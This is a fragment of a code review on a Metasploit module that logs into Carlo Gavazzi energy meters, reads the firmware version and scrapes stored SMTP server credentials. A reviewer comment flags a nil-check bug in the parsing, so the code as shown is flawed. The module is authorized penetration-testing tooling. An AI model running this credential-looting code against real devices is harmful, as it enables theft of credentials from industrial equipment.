modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb

```diff
@@ -0,0 +1,268 @@
+      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+
+      # Extract firmware version
+      begin
+        res = send_request_cgi(
+          {
+            'uri' => '/setupfirmware.php',
+            'method' => 'GET',
+            'headers' => {
+              'Cookie' => cookie_value
+            }
+          }
+        )
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        return :abort
+      end
+
+      if (res && res.code == 200 && res.body.include?('Firmware Version'))
+        fw_ver_dirty = res.body.match(/Firmware Version(.*)(.*)td/)
+
+        if !fw_ver_dirty.nil?
+          fw_ver_clean = "#{fw_ver_dirty}".match(/Ver. (.*)[$<]/)[1]
+          print_good("#{rhost}:#{rport} - Firmware version #{fw_ver_clean}...")
+
+          report_cred(
+            ip: rhost,
+            port: rport,
+            service_name: "Carlo Gavazzi Energy Meter [Firmware ver #{fw_ver_clean}]",
+            user: user,
+            password: pass
+          )
+        end
+      end
+
+      if (res && res.code == 200 && res.body.include?('Versione Firmware Installata'))
+        fw_ver_dirty = res.body.match(/Ver. (.*)[$<]/)
+
+        if !fw_ver_dirty.nil?
+          fw_ver_clean = "#{fw_ver_dirty}".match(/[^Ver. ](.*)[^<]/)
+          print_good("#{rhost}:#{rport} - Firmware version #{fw_ver_clean}...")
+
+          report_cred(
+            ip: rhost,
+            port: rport,
+            service_name: "Carlo Gavazzi Energy Meter [Firmware ver #{fw_ver_clean}]",
+            user: user,
+            password: pass
+          )
+        end
+      end
+
+      #
+      # Extract SMTP config
+      #
+
+      begin
+        res = send_request_cgi(
+          {
+            'uri'       => '/setupmail.php',
+            'method'    => 'GET',
+            'headers'   => {
+              'Cookie' => cookie_value
+            }
+          }
+        )
+
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        return :abort
+      end
+
+      if (res && res.code == 200 && res.body.include?('SMTP'))
+        dirty_smtp_server = res.body.match(/smtp" value=(.*)[$=]/)[1]
+        smtp_server = dirty_smtp_server.match(/[$"](.*)[$"]/)
+        dirty_smtp_user = res.body.match(/usersmtp" value=(.*)[$=]/)[1]
+        smtp_user = dirty_smtp_user.match(/[$"](.*)[$"]/)
+        dirty_smtp_pass = res.body.match(/passwordsmtp" value=(.*)[$=]/)[1]
+        smtp_pass = dirty_smtp_pass.match(/[$"](.*)[$"]/)
+
+        if (!dirty_smtp_server.nil?) && (!dirty_smtp_user.nil?) && (!dirty_smtp_pass.nil?)
```

Comment:
The problem is above you get dirty_*, then process it to a clean version.  However, you do the clean conversion w/o checking if dirty hit or not.  This line here should actually check the clean versions.